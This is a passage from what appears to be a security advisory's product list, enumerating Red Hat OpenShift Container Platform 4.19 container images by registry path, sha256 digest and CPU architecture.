"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
